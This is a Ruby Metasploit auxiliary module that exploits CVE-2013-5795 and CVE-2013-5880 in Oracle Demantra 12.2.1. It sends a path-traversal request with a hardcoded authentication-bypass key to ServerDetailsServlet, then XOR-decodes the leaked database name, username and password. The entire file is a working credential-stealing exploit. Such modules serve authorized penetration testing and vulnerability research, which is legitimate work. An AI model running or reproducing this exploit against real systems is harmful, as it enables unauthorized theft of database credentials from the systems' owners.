modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle Demantra Database Credentials Leak',
'Description' => %q{
This module exploits a database credentials leak found in Oracle Demantra 12.2.1 in
combination with an authentication bypass. This way an unauthenticated user can retrieve
the database name, username and password on any vulnerable machine.
},
'References' =>
[
[ 'CVE', '2013-5795'],
[ 'CVE', '2013-5880'],
[ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5795/'],
[ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5880/' ]
],
'Author' =>
[
'Oliver Gruskovnjak'
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2014-02-28'
))
register_options(
[
Opt::RPORT(8080),
OptBool.new('SSL', [false, 'Use SSL', false])
])
end
def run_host(ip)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri('demantra', 'common', 'loginCheck.jsp', '..', '..', 'ServerDetailsServlet'),
'vars_get' => {
'UAK' => '406EDC5447A3A43551CDBA06535FB6A661F4DC1E56606915AC4E382D204B8DC1'
}
})
if res.nil? or res.body.empty?
vprint_error("No content retrieved")
return
end
if res.code == 404
vprint_error("File not found")
return
end
if res.code == 200
creds = ""
vprint_status("String received: #{res.body.to_s}") unless res.body.blank?
res.body.to_s.split(",").each do|c|
i = c.to_i ^ 0x50
creds += i.chr
end
print_good("Credentials decoded: #{creds}") unless creds.empty?
end
end
end